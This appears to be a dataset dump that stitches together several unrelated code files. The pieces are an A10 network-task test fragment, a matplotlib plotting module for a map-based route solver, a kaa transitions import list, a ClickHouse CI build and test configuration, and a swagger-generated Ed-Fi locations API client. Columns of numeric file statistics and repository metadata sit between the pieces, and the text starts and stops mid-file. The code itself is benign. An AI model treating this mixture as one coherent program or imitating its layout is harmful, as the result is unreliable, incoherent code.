mock_network_task = a10_network_tasks.ReleaseSubnetAddressForMember()
mock_network_task.network_driver = self.client_mock
NAT_POOL.member_ref_count = 1
mock_network_task.execute(MEMBER, NAT_FLAVOR, NAT_POOL)
self.client_mock.delete_port.assert_called_with(NAT_POOL.port_id)
def test_PlugNetworksByID(self):
net_task = a10_network_tasks.PlugNetworksByID()
net_task.network_driver = self.client_mock
vthunder = copy.deepcopy(VTHUNDER)
NET_LIST = [1, 2, 3]
net_task.network_driver.get_plugged_networks.return_value = []
added_list = net_task.execute(vthunder, NET_LIST)
self.assertEqual(added_list, NET_LIST)
def test_GetVThunderNetworkList(self):
net_task = a10_network_tasks.GetVThunderNetworkList()
net_task.network_driver = self.client_mock
vthunder = copy.deepcopy(VTHUNDER)
nics = [MockNic(1), MockNic(2)]
net_task.network_driver.get_plugged_networks.return_value = nics
net_list = net_task.execute(vthunder)
self.assertEqual(net_list, [1, 2])
| 51.275974
| 99
| 0.719274
| 4,144
| 31,586
| 5.086149
| 0.061052
| 0.041752
| 0.044836
| 0.043839
| 0.879347
| 0.85776
| 0.842672
| 0.831285
| 0.820088
| 0.803293
| 0
| 0.030115
| 0.195751
| 31,586
| 615
| 100
| 51.35935
| 0.799591
| 0.018299
| 0
| 0.737589
| 0
| 0
| 0.091446
| 0.070504
| 0
| 0
| 0
| 0
| 0.088652
| 1
| 0.047872
| false
| 0.003546
| 0.024823
| 0
| 0.078014
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ef369080f185bb9d2bbafca02ca6c9e0c3541c5
| 1,778
|
py
|
Python
|
src/plot.py
|
steveandpeggyb/walking-salesman
|
0d8f9c5285f906774d67d81f8ae9c1b4b75098ef
|
[
"MIT"
] | 1,760
|
2018-01-22T13:41:46.000Z
|
2022-03-30T07:13:32.000Z
|
src/plot.py
|
bulentongun/som-tsp
|
0d8f9c5285f906774d67d81f8ae9c1b4b75098ef
|
[
"MIT"
] | 6
|
2018-01-21T17:33:29.000Z
|
2021-01-23T19:29:47.000Z
|
src/plot.py
|
bulentongun/som-tsp
|
0d8f9c5285f906774d67d81f8ae9c1b4b75098ef
|
[
"MIT"
] | 347
|
2018-01-21T17:22:35.000Z
|
2022-02-17T07:22:07.000Z
|
import matplotlib.pyplot as plt
import matplotlib as mpl
def plot_network(cities, neurons, name='diagram.png', ax=None):
"""Plot a graphical representation of the problem"""
mpl.rcParams['agg.path.chunksize'] = 10000
if not ax:
fig = plt.figure(figsize=(5, 5), frameon = False)
axis = fig.add_axes([0,0,1,1])
axis.set_aspect('equal', adjustable='datalim')
plt.axis('off')
axis.scatter(cities['x'], cities['y'], color='red', s=4)
axis.plot(neurons[:,0], neurons[:,1], 'r.', ls='-', color='#0063ba', markersize=2)
plt.savefig(name, bbox_inches='tight', pad_inches=0, dpi=200)
plt.close()
else:
ax.scatter(cities['x'], cities['y'], color='red', s=4)
ax.plot(neurons[:,0], neurons[:,1], 'r.', ls='-', color='#0063ba', markersize=2)
return ax
def plot_route(cities, route, name='diagram.png', ax=None):
"""Plot a graphical representation of the route obtained"""
mpl.rcParams['agg.path.chunksize'] = 10000
if not ax:
fig = plt.figure(figsize=(5, 5), frameon = False)
axis = fig.add_axes([0,0,1,1])
axis.set_aspect('equal', adjustable='datalim')
plt.axis('off')
axis.scatter(cities['x'], cities['y'], color='red', s=4)
route = cities.reindex(route)
route.loc[route.shape[0]] = route.iloc[0]
axis.plot(route['x'], route['y'], color='purple', linewidth=1)
plt.savefig(name, bbox_inches='tight', pad_inches=0, dpi=200)
plt.close()
else:
ax.scatter(cities['x'], cities['y'], color='red', s=4)
route = cities.reindex(route)
route.loc[route.shape[0]] = route.iloc[0]
ax.plot(route['x'], route['y'], color='purple', linewidth=1)
return ax
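# Usage sketch (added, illustrative only): both helpers expect `cities` to behave like a pandas
# DataFrame with 'x' and 'y' columns and `neurons` to be an (n, 2) array-like, e.g.
#   cities  = pandas.DataFrame({'x': [...], 'y': [...]})
#   neurons = numpy array of SOM neuron positions, shape (n, 2)
#   plot_network(cities, neurons, name='network.png')                  # cities + current neuron ring
#   plot_route(cities, route=cities.index.tolist(), name='route.png')  # closed tour through cities
# When an `ax` is passed, both functions draw onto it and return it instead of saving a file.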
| 34.862745
| 90
| 0.590551
| 252
| 1,778
| 4.126984
| 0.301587
| 0.034615
| 0.053846
| 0.076923
| 0.859615
| 0.859615
| 0.859615
| 0.859615
| 0.859615
| 0.788462
| 0
| 0.038821
| 0.21766
| 1,778
| 50
| 91
| 35.56
| 0.708843
| 0.056243
| 0
| 0.777778
| 0
| 0
| 0.092382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.055556
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1610a416b91b19c56aac02be25020e3d3d5b521e
| 841
|
py
|
Python
|
src/kaa/transitions.py
|
mmicek/kaa
|
3583edf19b0e453c7de6c316a08d9eda72a1fcfc
|
[
"MIT"
] | 17
|
2019-07-10T12:24:53.000Z
|
2022-02-19T21:39:19.000Z
|
src/kaa/transitions.py
|
mmicek/kaa
|
3583edf19b0e453c7de6c316a08d9eda72a1fcfc
|
[
"MIT"
] | 29
|
2019-07-10T12:30:58.000Z
|
2021-12-30T15:33:44.000Z
|
src/kaa/transitions.py
|
mmicek/kaa
|
3583edf19b0e453c7de6c316a08d9eda72a1fcfc
|
[
"MIT"
] | 8
|
2019-03-26T23:08:40.000Z
|
2022-01-10T03:39:59.000Z
|
from ._kaa import (
NodeTransition, NodeTransitionsSequence, NodeTransitionsParallel,
NodeCustomTransition, AttributeTransitionMethod, NodePositionTransition,
NodeRotationTransition, NodeScaleTransition, NodeColorTransition,
BodyNodeVelocityTransition, BodyNodeAngularVelocityTransition, NodeTransitionDelay,
NodeTransitionCallback, NodeSpriteTransition, NodeZIndexSteppingTransition,
)
__all__ = (
'NodeTransition', 'NodeTransitionsSequence', 'NodeTransitionsParallel',
'NodeCustomTransition', 'AttributeTransitionMethod', 'NodePositionTransition',
'NodeRotationTransition', 'NodeScaleTransition', 'NodeColorTransition',
'BodyNodeVelocityTransition', 'BodyNodeAngularVelocityTransition',
'NodeTransitionDelay', 'NodeTransitionCallback', 'NodeSpriteTransition',
'NodeZIndexSteppingTransition'
)
| 46.722222
| 87
| 0.821641
| 34
| 841
| 20.176471
| 0.558824
| 0.107872
| 0.174927
| 0.233236
| 0.976676
| 0.976676
| 0.976676
| 0.976676
| 0.976676
| 0.976676
| 0
| 0
| 0.10107
| 841
| 17
| 88
| 49.470588
| 0.907407
| 0
| 0
| 0
| 0
| 0
| 0.398335
| 0.26635
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
161f50fed200559c8174c71ca3ad6e1160d2df4d
| 25,030
|
py
|
Python
|
tests/ci/ci_config.py
|
newly12/ClickHouse
|
e1c2e629d8c077193f951cdb02fac9c0b1631c65
|
[
"Apache-2.0"
] | 1
|
2020-10-01T17:13:22.000Z
|
2020-10-01T17:13:22.000Z
|
tests/ci/ci_config.py
|
zhaoqiang75/ClickHouse
|
c86b43c7efc1c0cc9c66eb3c7d1274326378ce1b
|
[
"Apache-2.0"
] | null | null | null |
tests/ci/ci_config.py
|
zhaoqiang75/ClickHouse
|
c86b43c7efc1c0cc9c66eb3c7d1274326378ce1b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
CI_CONFIG = {
"build_config": [
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"alien_pkgs": True,
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "performance",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "gcc-11",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "address",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "undefined",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "thread",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "memory",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "debug",
"sanitizer": "",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
}
],
"special_build_config": [
{
"compiler": "clang-13",
"build_type": "debug",
"sanitizer": "",
"package_type": "deb",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "enable",
"with_coverage": False
},
{
"compiler": "clang-13",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "splitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-darwin",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-aarch64",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-freebsd",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-darwin-aarch64",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
},
{
"compiler": "clang-13-ppc64le",
"build_type": "",
"sanitizer": "",
"package_type": "binary",
"bundled": "bundled",
"splitted": "unsplitted",
"tidy": "disable",
"with_coverage": False
}
],
"tests_config": {
"Stateful tests (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (ubsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (release, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (release, DatabaseOrdinary, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateful tests (release, DatabaseReplicated, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (ubsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, wide parts enabled, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, DatabaseOrdinary, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests (release, DatabaseReplicated, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (undefined, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stress test (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (asan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (thread, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (release, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests (memory, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Integration tests flaky check (asan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Compatibility check (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Split build smoke test (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "binary",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "splitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Testflows check (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (release-gcc, actions)": {
"required_build_properties": {
"compiler": "gcc-11",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (release-clang, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "binary",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (asan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (msan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (tsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Unit tests (ubsan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (debug, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "debug",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (ASan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (MSan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "memory",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (TSan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "thread",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"AST fuzzer (UBSan, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "undefined",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Release (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"Stateless tests flaky check (address, actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "deb",
"build_type": "relwithdebuginfo",
"sanitizer": "address",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
},
"ClickHouse Keeper Jepsen (actions)": {
"required_build_properties": {
"compiler": "clang-13",
"package_type": "binary",
"build_type": "relwithdebuginfo",
"sanitizer": "none",
"bundled": "bundled",
"splitted": "unsplitted",
"clang_tidy": "disable",
"with_coverage": False
}
}
}
}
def build_config_to_string(build_config):
if build_config["package_type"] == "performance":
return "performance"
return "_".join([
build_config['compiler'],
build_config['build_type'] if build_config['build_type'] else "relwithdebuginfo",
build_config['sanitizer'] if build_config['sanitizer'] else "none",
build_config['bundled'],
build_config['splitted'],
'tidy' if 'tidy' in build_config and build_config['tidy'] == 'enable' else 'notidy',
'with_coverage' if 'with_coverage' in build_config and build_config['with_coverage'] else 'without_coverage',
build_config['package_type'],
])
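# Example (added): for the first entry of CI_CONFIG["build_config"] above, this function returns
#   "clang-13_relwithdebuginfo_none_bundled_unsplitted_notidy_without_coverage_deb"
# because an empty build_type/sanitizer falls back to "relwithdebuginfo"/"none", tidy == "disable"
# maps to "notidy", and with_coverage == False maps to "without_coverage"; a config whose
# package_type is "performance" short-circuits to just "performance".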
| 35.006993
| 117
| 0.428206
| 1,637
| 25,030
| 6.337202
| 0.051313
| 0.072874
| 0.127241
| 0.130808
| 0.938693
| 0.93503
| 0.926644
| 0.924523
| 0.916908
| 0.911606
| 0
| 0.008903
| 0.430084
| 25,030
| 714
| 118
| 35.056022
| 0.718332
| 0.000839
| 0
| 0.730986
| 0
| 0
| 0.419226
| 0.044906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001408
| false
| 0
| 0
| 0
| 0.004225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1676e0fc9a16d29b4b083d4f9396b24e10f51606
| 35,013
|
py
|
Python
|
src/v5.1/resources/swagger_client/api/locations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 2
|
2021-04-27T17:18:17.000Z
|
2021-04-27T19:14:39.000Z
|
src/v5.1/resources/swagger_client/api/locations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | null | null | null |
src/v5.1/resources/swagger_client/api/locations_api.py
|
xmarcosx/edfi-notebook
|
0564ebdf1d0f45a9d25056e7e61369f0a837534d
|
[
"Apache-2.0"
] | 1
|
2022-01-06T09:43:11.000Z
|
2022-01-06T09:43:11.000Z
|
# coding: utf-8
"""
Ed-Fi Operational Data Store API
The Ed-Fi ODS / API enables applications to read and write education data stored in an Ed-Fi ODS through a secure REST interface. *** > *Note: Consumers of ODS / API information should sanitize all data for display and storage. The ODS / API provides reasonable safeguards against cross-site scripting attacks and other malicious content, but the platform does not and cannot guarantee that the data it contains is free of all potentially harmful content.* *** # noqa: E501
OpenAPI spec version: 3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class LocationsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_location_by_id(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_location_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_location_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_location_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_location_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Deletes an existing resource using the resource identifier. # noqa: E501
The DELETE operation is used to delete an existing resource by identifier. If the resource doesn't exist, an error will result (the resource will not be found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_location_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_match: The ETag header value used to prevent the DELETE from removing a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_location_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_location_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/locations/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
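# --- Editorial usage sketch (not part of the generated client) -------------
# A minimal illustration of the DELETE flow defined above, assuming a default
# ApiClient that already holds a valid OAuth2 access token; the identifier and
# ETag value are hypothetical placeholders.
#
#     api = LocationsApi()
#     api.delete_location_by_id("abc123", if_match='"5250159503"')
#
# With async_req=True the call instead returns a thread; thread.get() blocks
# until the DELETE completes.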
def deletes_locations(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
The DELETES operation is used to retrieve deleted resources. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.deletes_locations(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset: Indicates how many items should be skipped before returning results.
:param int limit: Indicates the maximum number of items that should be returned in the results.
:param int min_change_version: Used in synchronization to set sequence minimum ChangeVersion
:param int max_change_version: Used in synchronization to set sequence maximum ChangeVersion
:return: list[EdFiLocation]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.deletes_locations_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.deletes_locations_with_http_info(**kwargs) # noqa: E501
return data
def deletes_locations_with_http_info(self, **kwargs): # noqa: E501
"""Retrieves deleted resources based on change version. # noqa: E501
